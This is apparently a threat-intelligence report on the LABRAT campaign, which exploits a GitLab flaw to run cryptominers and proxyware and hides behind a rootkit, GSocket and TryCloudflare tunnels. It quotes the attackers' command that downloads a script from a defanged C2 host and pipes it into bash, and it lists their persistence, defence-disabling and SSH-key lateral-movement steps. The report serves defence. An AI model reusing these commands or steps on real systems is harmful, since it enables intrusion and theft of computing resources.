A new campaign called LABRAT is targeting GitLab with cryptojacking and proxyjacking.
LABRAT, a financially motivated operation, has been uncovered by the Sysdig Threat Research Team (TRT). Notably, the attackers have prioritized stealth and defense evasion tactics.
The LABRAT attackers used an open-source rootkit called hiding-cryptominers-linux-rootkit to conceal their crypto-mining activity by hiding files, processes, and CPU usage.
Technical Analysis – GitLab exploitation
The attacker gained initial access to a container by exploiting the known GitLab vulnerability, CVE-2021-22205. In this vulnerability, GitLab does not properly validate image files passed to a file parser, resulting in a remote command execution. There are many public exploits for this vulnerability, which is still actively exploited.
- Once the attacker had access to the server, they executed the following command to download a malicious script from the C2 server.
curl -kL -u lucifer:369369 https://passage-television-gardening-venue[.]trycloudflare.com/v3 | bash - The initial script allowed the attacker to achieve persistence, evade defenses, and perform lateral movement through the following actions:
- Check whether or not the watchdog process was already running to kill it.
- Delete malicious files if they exist from a previous run.
- Disable Tencent Cloud and Alibaba’s defensive measures, a recurring feature of many attackers.
- Download malicious binaries.
- Create a new service with one of these binaries and if root, ran it on the fly.
- Modify various cron files to maintain persistence.
- Gather SSH keys to connect to those machines and start the process again, doing lateral movement.
- Deletes any evidence that the above processes may have generated.
Uses TryCloudflare
TryCloudFlare is a user-friendly service that benefits defenders, but it also creates opportunities for attackers.
The attacker attempted to obfuscate their C2 location by creating subdomains on trycloudflare[.]com. This domain is legitimate, as it is owned and operated by Cloudflare, but it is also used to create subdomains used for phishing.
To create a new domain, it is as simple as only downloading and installing Cloudflared, then running the following command, and you’re done:
/cloudflared tunnel -url "$HOST": "$PORT"
In the LABRAT operation, a malicious shell script was hosted on a password-protected web server, and connections were redirected through TryCloudFlare. Identifying subdomains as malicious can be challenging for defenders, particularly when legitimate infrastructure like TryCloudFlare is also utilized in normal operations.
GSocket Enters
Attackers always want to maintain remote access to their victims. Typically, this is by installing malware, which provides a backdoor.
In the case of LABRAT, they used the open source tool GSocket, which has both legitimate and malicious uses, similar to Netcat. Unlike Netcat, GSocket provides features such as a custom relay or proxy network, encryption, and the ability to use TOR, making it a very capable tool for stealthy C2 communications. The attacker using LABRAT attempted to conceal the installation process to eliminate any traces of its presence.
How GSocket works
“Global Socket allows two workstations on different private networks to communicate with each other.”
Proxyjacking with ProxyLite and IPRoyal
While investigating the private repository, we discovered a binary named rcu_tr. The security researchers found it is linked to IPRoyal, a known proxyware service. When you run the binary, you share your internet bandwidth with others who pay to use your IP address. The Sysdig TRT reported in “Proxyjacking has entered the chat” the use of this software on victims to generate income for malicious actors.
During the investigation, we discovered that the attacker used multiple binaries on their compromised systems. One of the binaries was a cryptominer, while the other initially appeared harmless. As of writing this, VirusTotal had not detected the latter binary, which was renamed from initd to sysinit.
Final Words
The use of stealthy and evasive techniques and tools in this operation pose a challenge to defense and detection. As the LABRAT operation is financially motivated, time is of the essence. The longer the attack goes unnoticed, the more profit the attacker gains, and the greater the losses for the victim. A robust threat detection and response program is necessary to quickly detect and respond to the attack.
Cryptomining and proxyjacking are serious malware threats. Before rebuilding a system, ensure all security measures have been taken to guarantee its safety. As seen in this operation, malware can spread to other systems with SSH keys automatically. We have previously seen attackers install cryptominers and steal financial property, as with SCARLETEEL.
